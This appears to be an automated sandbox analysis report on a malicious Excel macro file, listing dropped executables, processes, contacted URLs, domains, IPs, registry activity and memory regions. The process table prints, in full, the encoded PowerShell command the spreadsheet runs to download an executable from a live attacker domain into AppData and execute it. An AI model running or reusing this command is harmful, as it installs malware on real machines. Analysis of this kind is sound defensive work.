Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
MV TRIADES.xlsm
|
Microsoft Excel 2007+
|
initial sample
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\Desktop\~$MV TRIADES.xlsm
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, 58596 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\ConsoleApp1\tNDFx.exe_Url_1w40bkugt4lbn414pfn202m3aujsqqra\7.926.901.773\qf3mddhz.newcfg
|
XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\625B6235.jpg
|
PNG image data, 1243 x 610, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEF21AB2.png
|
PNG image data, 225 x 225, 8-bit colormap, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Cab9934.tmp
|
Microsoft Cabinet archive data, 58596 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Tar9935.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SFY2ZDAX72H3NDC9G39.temp
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
'C:\Users\user\AppData\Roaming\tNDFx.exe'
|
||
C:\Windows\SysWOW64\cmd.exe
|
'C:\Windows\System32\cmd.exe' /c timeout 1
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
C:\Users\user\AppData\Roaming\tNDFx.exe
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
C:\Users\user\AppData\Roaming\tNDFx.exe
|
||
C:\Windows\SysWOW64\timeout.exe
|
timeout 1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-
|
unknown
|
||
http://specfloors.net/dev/income
|
unknown
|
||
http://specfloors.net/dev/income.exe
|
107.180.99.252
|
||
http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html
|
172.67.176.78
|
||
http://specfloors.net/dev/income.exePE
|
unknown
|
||
http://liverpoolsupporters9.com
|
unknown
|
||
http://specfloors.net
|
unknown
|
||
http://127.0.0.1:HTTP/1.1
|
unknown
|
||
http://DynDns.comDynDNS
|
unknown
|
||
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
|
unknown
|
||
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
http://smtp.jiratane.com
|
unknown
|
||
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
https://www.liverpool.com/liverpool-fc-news/features/
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
|
unknown
|
||
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
|
unknown
|
||
http://crl3.dJ
|
unknown
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
||
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
|
unknown
|
||
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
|
unknown
|
||
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
|
unknown
|
||
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
|
unknown
|
||
http://jEOkvI.com
|
unknown
|
||
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
|
unknown
|
||
http://www.piriform.com/ccleaner
|
unknown
|
||
https://api.ipify.org%GETMozilla/5.0
|
unknown
|
||
https://i2-prod.live
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
https://oMAWpB8PlZYBRN.org
|
unknown
|
||
https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
https://www.liverpool.com/all-about/steven-gerrard
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
https://api.ipify.org%
|
unknown
|
||
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
|
unknown
|
||
http://servername/isapibackend.dll
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
|
unknown
|
There are 36 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
smtp.jiratane.com
|
198.54.116.63
|
||
specfloors.net
|
107.180.99.252
|
||
liverpoolsupporters9.com
|
172.67.176.78
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
198.54.116.63
|
smtp.jiratane.com
|
United States
|
||
172.67.176.78
|
liverpoolsupporters9.com
|
United States
|
||
107.180.99.252
|
specfloors.net
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ux1
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ED49E
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
DefaultSheetR2L
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
UseSystemSeparators
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ThousandsSeparator
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
DecimalSeparator
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
gb1
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Max Display
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Max Display
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 1
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 2
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 3
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 4
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 5
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 6
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 7
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 8
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 9
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 10
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 11
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 12
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 13
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 14
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 15
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 16
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 17
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 18
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 19
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 20
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
F384F
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Max Display
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Max Display
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 1
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 2
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 3
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 4
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 5
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 6
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 7
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 8
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 9
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 10
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 11
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 12
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 13
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 14
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 15
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 16
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 17
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 18
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 19
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 20
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
F3B6B
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
EXCELFiles
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ProductFiles
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
EnableFileTracing
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
EnableConsoleTracing
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
FileTracingMask
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
ConsoleTracingMask
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
MaxFileSize
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
FileDirectory
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
EnableFileTracing
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
EnableConsoleTracing
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
FileTracingMask
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
ConsoleTracingMask
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
MaxFileSize
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
FileDirectory
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
Blob
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
Blob
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
Blob
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
Blob
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
Blob
|
||
C:\Users\user\AppData\Roaming\tNDFx.exe
|
Blob
|
There are 97 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
402000
|
unkown
|
page execute and read and write
|
||
226B000
|
unkown
|
page read and write
|
||
221A000
|
unkown
|
page read and write
|
||
2191000
|
unkown
|
page read and write
|
||
2BD1000
|
unkown
|
page read and write
|
||
6A8F000
|
unkown
|
page read and write
|
||
5A0000
|
unkown
|
page read and write
|
||
2EB8000
|
unkown
|
page read and write
|
||
6B0000
|
unkown
|
page read and write
|
||
D00000
|
unkown
|
page readonly
|
||
2EF0000
|
unkown
|
page read and write
|
||
730000
|
unkown
|
page read and write
|
||
7E0000
|
unkown
|
page read and write
|
||
BAF000
|
unkown
|
page read and write
|
||
328000
|
heap default
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page write copy
|
||
4D70000
|
unkown
|
page readonly
|
||
6B0000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
3AE000
|
unkown
|
page read and write
|
||
8E0000
|
unkown image
|
page readonly
|
||
385000
|
unkown
|
page read and write
|
||
8E2000
|
unkown image
|
page execute read
|
||
385000
|
unkown
|
page read and write
|
||
357D000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
7D0000
|
unkown
|
page read and write
|
||
5720000
|
unkown
|
page read and write
|
||
850000
|
unkown
|
page readonly
|
||
337000
|
unkown
|
page read and write
|
||
1BD000
|
unkown
|
page execute and read and write
|
||
837000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
3710000
|
unkown
|
page read and write
|
||
568C000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
2AAF000
|
unkown
|
page read and write
|
||
5712000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
3929000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
7FF001F0000
|
unkown
|
page execute and read and write
|
||
385000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
3576000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
2E09000
|
unkown
|
page read and write
|
||
5EE000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
569F000
|
unkown
|
page read and write
|
||
1A5000
|
unkown
|
page execute and read and write
|
||
385000
|
unkown
|
page read and write
|
||
3C5000
|
unkown
|
page read and write
|
||
240000
|
unkown
|
page read and write
|
||
518E000
|
stack
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page read and write
|
||
2C0000
|
unkown
|
page read and write
|
||
1B60000
|
unkown
|
page write copy
|
||
3AF000
|
unkown
|
page read and write
|
||
390B000
|
unkown
|
page read and write
|
||
2E12000
|
unkown
|
page read and write
|
||
7E0000
|
unkown
|
page read and write
|
||
7DE000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
7E8000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
FFF30000
|
unkown
|
page execute and read and write
|
||
3953000
|
unkown
|
page read and write
|
||
23D000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
3509000
|
unkown
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
3C8000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
7FF00105000
|
unkown
|
page read and write
|
||
3B5000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
45F0000
|
unkown
|
page readonly
|
||
385000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
598E000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
8F2000
|
unkown image
|
page readonly
|
||
28B0000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page read and write
|
||
20BE000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
53DE000
|
unkown
|
page read and write
|
||
7FF0010A000
|
unkown
|
page execute and read and write
|
||
AC7000
|
heap default
|
page read and write
|
||
12C000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page read and write
|
||
B0D000
|
heap default
|
page read and write
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
4F7000
|
heap default
|
page read and write
|
||
72B000
|
unkown
|
page read and write
|
||
22CE000
|
unkown
|
page read and write
|
||
1E00000
|
unkown
|
page readonly
|
||
385000
|
unkown
|
page read and write
|
||
3503000
|
unkown
|
page read and write
|
||
114000
|
heap private
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
3850000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
3506000
|
unkown
|
page read and write
|
||
34CA000
|
unkown
|
page read and write
|
||
3137000
|
unkown
|
page read and write
|
||
3045000
|
unkown
|
page read and write
|
||
2E28000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
20A000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
8E0000
|
unkown image
|
page readonly
|
||
240A000
|
unkown
|
page read and write
|
||
397E000
|
unkown
|
page read and write
|
||
5E1F000
|
stack
|
page read and write
|
||
5A0000
|
unkown
|
page read and write
|
||
1B430000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
1CBF0000
|
unkown
|
page read and write
|
||
58E8000
|
unkown
|
page read and write
|
||
6850000
|
heap private
|
page read and write
|
||
731000
|
unkown
|
page read and write
|
||
2F7D000
|
unkown
|
page read and write
|
||
34B7000
|
unkown
|
page read and write
|
||
78D000
|
unkown
|
page read and write
|
||
880000
|
heap private
|
page execute and read and write
|
||
3988000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
38CD000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
2B10000
|
unkown
|
page read and write
|
||
1B4DB000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
2E51000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
5251000
|
unkown
|
page read and write
|
||
53F000
|
heap default
|
page read and write
|
||
34C4000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
1B8E0000
|
unkown
|
page read and write
|
||
56AC000
|
unkown
|
page read and write
|
||
42DD000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
837000
|
unkown
|
page read and write
|
||
3101000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
7E0000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page readonly
|
||
6D2000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
20D0000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page read and write
|
||
4F20000
|
unkown
|
page readonly
|
||
8E0000
|
unkown image
|
page readonly
|
||
182000
|
unkown
|
page read and write
|
||
4A4000
|
heap default
|
page read and write
|
||
1BAAE000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
2F40000
|
unkown
|
page read and write
|
||
38E9000
|
unkown
|
page read and write
|
||
1F40000
|
unkown
|
page readonly
|
||
38B000
|
unkown
|
page read and write
|
||
5D0000
|
heap default
|
page read and write
|
||
3934000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
347000
|
heap default
|
page read and write
|
||
6C0000
|
heap private
|
page read and write
|
||
7FF0004C000
|
unkown
|
page execute and read and write
|
||
69AE000
|
stack
|
page read and write
|
||
1B820000
|
unkown
|
page write copy
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
34CD000
|
unkown
|
page read and write
|
||
2ED8000
|
unkown
|
page read and write
|
||
56CA000
|
unkown
|
page read and write
|
||
163000
|
unkown
|
page execute and read and write
|
||
7D0000
|
unkown
|
page read and write
|
||
80000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
7D44000
|
heap private
|
page read and write
|
||
B4000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page read and write
|
||
3896000
|
unkown
|
page read and write
|
||
4FC000
|
heap default
|
page read and write
|
||
730000
|
unkown
|
page read and write
|
||
1FC0000
|
unkown
|
page write copy
|
||
7FF00100000
|
unkown
|
page read and write
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
1DBB000
|
heap private
|
page read and write
|
||
1E10000
|
unkown
|
page readonly
|
||
507E000
|
unkown
|
page read and write
|
||
38DF000
|
unkown
|
page read and write
|
||
2414000
|
unkown
|
page read and write
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
385000
|
unkown
|
page read and write
|
||
3B0000
|
unkown
|
page readonly
|
||
730000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
3C1000
|
unkown
|
page read and write
|
||
1A2000
|
unkown
|
page read and write
|
||
7D0000
|
unkown
|
page read and write
|
||
19D000
|
stack
|
page read and write
|
||
2E92000
|
unkown
|
page read and write
|
||
9C0000
|
unkown
|
page read and write
|
||
34E0000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
593000
|
unkown
|
page read and write
|
||
17A000
|
unkown
|
page read and write
|
||
721000
|
unkown
|
page read and write
|
||
3C1000
|
unkown
|
page read and write
|
||
2C0F000
|
unkown
|
page read and write
|
||
690000
|
unkown
|
page read and write
|
||
6A0000
|
unkown
|
page read and write
|
||
1BD0000
|
unkown
|
page read and write
|
||
1D10000
|
unkown
|
page readonly
|
||
5CBF000
|
unkown
|
page read and write
|
||
36DB000
|
unkown
|
page read and write
|
||
1D60000
|
heap private
|
page read and write
|
||
12D41000
|
unkown
|
page read and write
|
||
FFF20000
|
unkown
|
page execute and read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
310E000
|
unkown
|
page read and write
|
||
45EF000
|
unkown
|
page read and write
|
||
2E2E000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
480000
|
heap default
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
392D000
|
unkown
|
page read and write
|
||
8E2000
|
unkown image
|
page execute read
|
||
2B20000
|
unkown
|
page readonly
|
||
690000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
695000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
830000
|
unkown
|
page read and write
|
||
56CA000
|
unkown
|
page read and write
|
||
590000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
1B6000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page read and write
|
||
56D1000
|
unkown
|
page read and write
|
||
8E0000
|
unkown image
|
page readonly
|
||
176000
|
unkown
|
page read and write
|
||
385000
|
unkown
|
page read and write
|
||
4C0000
|
heap default
|
page read and write
|
||
2D0000
|
unkown
|
page read and write
|
||
4A24000
|
heap private
|
page read and write
|
||
2EAB000
|
unkown
|
page read and write
|
||
6A2E000
|
unkown
|
page read and write
|
||
6B0000
|
unkown
|
page read and write
|
||
491E000
|
unkown
|
page read and write
|
||
5620000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
212000
|
unkown
|
page read and write
|
||
386000
|
unkown
